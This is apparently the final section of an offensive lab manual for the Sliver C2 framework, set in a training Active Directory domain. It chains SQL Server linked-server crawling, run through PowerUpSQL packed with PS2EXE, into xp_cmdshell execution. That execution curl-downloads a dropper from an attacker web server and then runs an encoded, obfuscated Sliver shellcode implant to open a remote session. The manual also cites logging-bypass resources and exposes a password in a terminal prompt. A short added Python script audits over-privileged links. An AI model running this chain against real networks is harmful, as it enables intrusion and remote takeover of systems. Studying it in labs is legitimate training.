We aren’t a sysadmin on the instance. The Get-LinkedServers command in SharpSQL, like most alternative C# MSSQL offensive tools, executes EXEC sp_linkedservers; to enumerate the linked servers defined on the local server. However, links defined on the linked servers themselves are not listed and can be missed.

Since SharpSQL doesn’t have a Get-SQLServerLinkCrawl module to traverse multiple links at a time, each SQL Server link would have to be traversed one at a time with SharpSQL using large nested OPENQUERY statements. Since this is cumbersome, we avoid it by using PowerUpSQL.ps1 with a Get-SQLServerLinkCrawl command appended at the end, so that the script executes the crawl when run, and then converting the script into a .NET x86-x64 assembly using PS2EXE, as we did in the previous modules, so that it can be used with execute-assembly.

Begin by copying and renaming the script as PowerUpSQLEx.ps1.


PS C:\Windows\System32> copy C:\AD\Tools\PowerUpSQL-master\PowerUpSQL.ps1 C:\AD\Tools\PowerUpSQLEx.ps1

Next, append the following query at the end to crawl and enumerate linked servers.
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local

Finally, execute the ps2exe.ps1 script to convert the .ps1 into a .NET executable as follows.

PS C:\AD\Tools> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -outputFile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta

PS2EXE-GUI v0.5.0.27 by Ingo Karstein, reworked and GUI support by Markus Scholtes

You are using PowerShell 4.0 or above.

Reading input file C:\AD\Tools\ps2exe\PowerUpSQLEx.ps1


Compiling file...

Output file C:\AD\Tools\ps2exe\PowerUpSQLEx.exe written

Finally, execute PowerUpSQLEx.exe using execute-assembly as follows.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PowerUpSQLEx.exe'

[*] Output:

Version : SQL Server 2019
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\studentX
Links : {DCORP-SQL1}

Version : SQL Server 2019
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2019
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQLX.EU.EUROCORP.LOCAL}

Version : SQL Server 2019
Instance : EU-SQLX
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQLX.EU.EUROCORP.LOCAL}
User : sa
Links :

We found two new links, to dcorp-mgmt and eu-sqlx. Note also that the link to eu-sqlx, which is part of the EU.EUROCORP.LOCAL domain, maps to sa, so we have sysadmin privileges there.
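The crawl output above is exactly what a database administrator should review for over-privileged link logins. The Python script below is an added example, not part of the lab or of PowerUpSQL: it parses the record format Get-SQLServerLinkCrawl prints (a constructed copy of the output above is embedded) and flags hops whose stored link login is sysadmin on the remote server, hops that cross a domain boundary, and long chains; the starting domain is passed in because short instance names carry no domain.

```python
# Added example (not part of the lab or of PowerUpSQL): audit the link chain
# that Get-SQLServerLinkCrawl reports. Constructed copy of the crawl output.
SAMPLE_CRAWL = r"""
Version     : SQL Server 2019
Instance    : DCORP-MSSQL
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL}
User        : dcorp\studentX
Links       : {DCORP-SQL1}

Version     : SQL Server 2019
Instance    : DCORP-SQL1
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1}
User        : dblinkuser
Links       : {DCORP-MGMT}

Version     : SQL Server 2019
Instance    : DCORP-MGMT
CustomQuery :
Sysadmin    : 0
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User        : sqluser
Links       : {EU-SQLX.EU.EUROCORP.LOCAL}

Version     : SQL Server 2019
Instance    : EU-SQLX
CustomQuery :
Sysadmin    : 1
Path        : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQLX.EU.EUROCORP.LOCAL}
User        : sa
Links       :
"""


def parse_crawl(text):
    """One dict per reached instance; records are separated by blank lines."""
    records, current = [], {}
    for line in text.splitlines():
        if not line.strip():
            if current:
                records.append(current)
                current = {}
            continue
        key, _, value = line.partition(":")
        current[key.strip().lower()] = value.strip()
    if current:
        records.append(current)
    return records


def _braced_list(value):
    """'{A, B}' -> ['A', 'B']; '' -> []."""
    return [v.strip() for v in value.strip("{}").split(",") if v.strip()]


def _domain(host, default_domain):
    """Domain part of an FQDN; short names are assumed to be in default_domain."""
    host = host.lower()
    return host.split(".", 1)[1] if "." in host else default_domain


def audit_links(records, start_domain):
    """Flag each hop whose stored link login or reach a DBA should review."""
    findings = []
    for rec in records:
        path = _braced_list(rec.get("path", ""))
        if len(path) < 2:            # the crawl start is reached with our own login
            continue
        hop_from, hop_to = path[-2], path[-1]
        src, dst = _domain(hop_from, start_domain), _domain(hop_to, start_domain)
        reasons = []
        if rec.get("sysadmin") == "1":
            reasons.append(f"link login '{rec.get('user')}' is sysadmin on {hop_to}")
        if src != dst:
            reasons.append(f"link crosses from {src} into {dst}")
        if len(path) > 3:
            reasons.append(f"reachable through a {len(path) - 1}-hop chain")
        if reasons:
            findings.append({"from": hop_from, "to": hop_to,
                             "login": rec.get("user", ""), "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_links(parse_crawl(SAMPLE_CRAWL), "dollarcorp.moneycorp.local"):
        print(f"[!] {f['from']} -> {f['to']} as '{f['login']}'")
        for reason in f["reasons"]:
            print(f"      {reason}")
```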

Exploiting SQL Server links
Using PS2EXE, PowerUpSQL
Edit PowerUpSQLEx.ps1 again and append the following line to the end, so that the script runs the Get-SQLServerLinkCrawl module with a query that executes xp_cmdshell to test command execution on the target.
Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query "exec master..xp_cmdshell 'whoami'"

Next use the ps2exe.ps1 script to convert PowerUpSQLEx.ps1 into a .NET assembly compatible with the
execute-assembly command as follows.
PS C:\AD\Tools> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -outputFile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta

PS2EXE-GUI v0.5.0.27 by Ingo Karstein, reworked and GUI support by Markus Scholtes

You are using PowerShell 4.0 or above.

Reading input file C:\AD\Tools\ps2exe\PowerUpSQLEx.ps1


Compiling file...

Output file C:\AD\Tools\ps2exe\PowerUpSQLEx.exe written

Execute the .NET PowerUpSQLEx.exe using execute-assembly as follows.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PowerUpSQLEx.exe'

[*] Output:

Version : SQL Server 2017
Instance : DCORP-MSSQL
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL}
User : dcorp\studentX
Links : {DCORP-SQL1}

Version : SQL Server 2017
Instance : DCORP-SQL1
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1}
User : dblinkuser
Links : {DCORP-MGMT}

Version : SQL Server 2017
Instance : DCORP-MGMT
CustomQuery :
Sysadmin : 0
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT}
User : sqluser
Links : {EU-SQLX.EU.EUROCORP.LOCAL}

Version : SQL Server 2017
Instance : EU-SQLX
CustomQuery : {nt authority\network service, }
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQLX.EU.EUROCORP.LOCAL}
User : sa
Links :

Now that we have sysadmin and xp_cmdshell privileges on EU-SQLX, we can move laterally by uploading a generated payload and executing it via xp_cmdshell.

Generate a corresponding https implant for eu-sqlx as follows.


[server] sliver (dcorp-std_https) > generate -b https://172.16.100.X -e -f shellcode -N eu-sqlx_https

[*] Generating new windows/amd64 implant binary


[*] Symbol obfuscation is enabled
[*] Build completed in 1m43s
[*] Encoding shellcode with shikata ga nai ... success!
[*] Implant saved to /mnt/c/AD/Tools/Sliver/eu-sqlx_https.bin

Host the shellcode using HFS or a Python 3 web server.

wsluser@dcorp-studentX:~$ cd /mnt/c/AD/Tools/Sliver

wsluser@dcorp-studentX:~$ sudo python3 -m http.server 80
[sudo] password for wsluser: WSLToTh3Rescue!
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...

Upload NtDropper onto eu-sqlx by leveraging xp_cmdshell with the following command.

NOTE: We use cmd /c start /b to run the command in the background and avoid timeout issues.

Get-SQLServ
erLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'exec master..xp_cmdshell "cmd /c start /b curl --output C:\Windows\temp\NtDropper.exe --url http://172.16.100.X/NtDropper.exe"' -QueryTarget eu-sqlx

Append the above command to PowerUpSQLEx.ps1 and convert it to a .NET exe as before using ps2exe.
PS C:\AD\Tools\ps2exe> .\ps2exe.ps1 -inputFile C:\AD\Tools\PowerUpSQLEx.ps1 -outputFile C:\AD\Tools\PowerUpSQLEx.exe -x64 -sta

Execute the following command with execute-assembly to download our NtDropper.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PowerUpSQLEx.exe'
[*] Output:

[....snip......]

Version : SQL Server 2017
Instance : EU-SQLX
CustomQuery :
Sysadmin : 1
Path : {DCORP-MSSQL, DCORP-SQL1, DCORP-MGMT, EU-SQLX.EU.EUROCORP.LOCAL}
User : sa
Links :

Repeat the process of converting PowerUpSQLEx.ps1 into an assembly one last time, this time using NtDropper to download and execute our generated shellcode via execute-assembly.

NOTE: Wait a few minutes before executing the Sliver payload, since the generated payload is 10 MB+.

Get-SQLServerLinkCrawl -Instance dcorp-mssql.dollarcorp.moneycorp.local -Query 'exec master..xp_cmdshell "cmd /c start /b C:\Windows\Temp\NtDropper.exe 172.16.100.X eu-sqlx_https.bin"' -QueryTarget eu-sqlx

After executing with execute-assembly we finally have a Sliver Session on eu-sqlx.


[server] sliver (dcorp-std_https) > execute-assembly -P 2396 -p 'c:\windows\System32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/PowerUpSQLEx.exe'
[*] Output:

[....snip......]

[*] Session 868da2e2 eu-sqlx_https - 172.16.15.17:49815 (eu-sqlx) - windows/amd64 - Wed, 14 Feb 2024 05:57:40 PST

Resources and Tools
Some useful resources that were referred to while writing this manual, and that are recommended reading, are listed below.

• Getting Started with Sliver (Official Wiki): https://github.com/BishopFox/sliver/wiki/Getting-Started

• Sliver GUI: https://github.com/BishopFox/sliver-gui

• Sliver OPSEC Notes: https://tishina.in/opsec/sliver-opsec-notes

• Hunting Sliver C2’s by Microsoft: https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/

• BC Security’s logging bypasses: https://www.bc-security.org/post/powershell-logging-obfuscation-and-some-newish-bypasses-part-1/

• ScriptBlock bypass by cobbr.io: https://cobbr.io/ScriptBlock-Logging-Bypass.html

• LDAP filters explained by Microsoft: https://social.technet.microsoft.com/wiki/contents/articles/5392.active-directory-ldap-syntax-filters.aspx

• Popular LDAP filters by ldapexplorer: http://www.ldapexplorer.com/en/manual/109050000-famous-filters.htm

• PPID Spoofing by ired.team: https://www.ired.team/offensive-security/defense-evasion/parent-process-id-ppid-spoofing

• PEzor Blog series: https://github.com/phra/PEzor#PEzor

• Sliver’s rportfwd command: https://github.com/BishopFox/sliver/wiki/Port-Forwarding#reverse-port-forwarding

• Sliver’s SOCKS5 command: https://github.com/BishopFox/sliver/wiki/Reverse-SOCKS#in-band-socks5

A list of all tools used throughout the lab is given below.

• Sliver: https://github.com/BishopFox/sliver/releases

• StandIn: https://github.com/FuzzySecurity/StandIn

• ADSearch: https://github.com/tomcarver16/ADSearch

• ADCollector: https://github.com/dev-2null/ADCollector

• Dsquery: https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2012-r2-and-2012/cc732952(v=ws.11)

• Bloodhound: https://github.com/BloodHoundAD/BloodHound

• SharpHound: https://github.com/BloodHoundAD/SharpHound

• silenthound.py: https://github.com/layer8secure/SilentHound

• Sa-schtasksenum: https://github.com/sliverarmory

• Sa-Netshares: https://github.com/sliverarmory

• Sa-sc-enum: https://github.com/trustedsec/CS-Situational-Awareness-BOF/blob/master/SA/

• SharpUp: https://github.com/GhostPack/SharpUp

• Seatbelt: https://github.com/GhostPack/Seatbelt

• LACheck: https://github.com/mitchmoser/LACheck

• CIMplant: https://github.com/FortyNorthSecurity/CIMplant

• remote-sc-tools: https://github.com/sliverarmory

• psexec: https://github.com/BishopFox/sliver/blob/7d07f4c518838f8a31c532ac9ad5c79ec9db15f6/client/command/exec/psexec.go

• SharpWMI: https://github.com/GhostPack/SharpWMI

• Python3 Webserver: https://developer.mozilla.org/en-US/docs/Learn/Common_questions/set_up_a_local_testing_server

• Stracciatella: https://github.com/mgeeky/Stracciatella

• Execute-Assembly: https://github.com/med0x2e/ExecuteAssembly

• Inline-execute-assembly: https://github.com/anthemtotheego/InlineExecute-Assembly

• PS2EXE: https://github.com/MScholtes/PS2EXE

• PEzor: https://github.com/phra/PEzor

• SharpKatz: https://github.com/b4rtik/SharpKatz

• SharpSecDump: https://github.com/G0ldenGunSec/SharpSecDump

• Invoke-Mimikatz: https://github.com/PowerShellMafia/PowerSploit/blob/master/Exfiltration/Invoke-Mimikatz.ps1

• RACE Toolkit: https://github.com/samratashok/RACE

• Rubeus: https://github.com/GhostPack/Rubeus

• RubeusToCcache: https://github.com/SolomonSklash/RubeusToCcache

• c2tc-kerberoast: https://github.com/outflanknl/C2-Tool-Collection/tree/main/BOF/Kerberoast

• Get-RBCD-Threaded: https://github.com/FatRodzianko/Get-RBCD-Threaded

• SharpAllowedToAct-Modify: https://github.com/pkb1s/SharpAllowedToAct

• delegationbof: https://github.com/IcebreakerSecurity/DelegationBOF

• Certify: https://github.com/GhostPack/Certify

• PowerUpSQL: https://github.com/NetSPI/PowerUpSQL

• Hashcat: https://github.com/hashcat/hashcat

• Process Hacker: https://processhacker.sourceforge.io/

Closing Note
This lab manual provides insight into operating Sliver competently with a good sense of endpoint OPSEC. However, Sliver can implement many more advanced techniques, such as reflective DLLs, syscall integration, DLL hijacking, SOCKS5, rportfwd, BOF execution, etc., to handle advanced protections like MDE, Sysmon, ETW, ASR and the like. This lab manual should provide the base competency to research tackling such intermediate and advanced defenses using the Sliver C2.
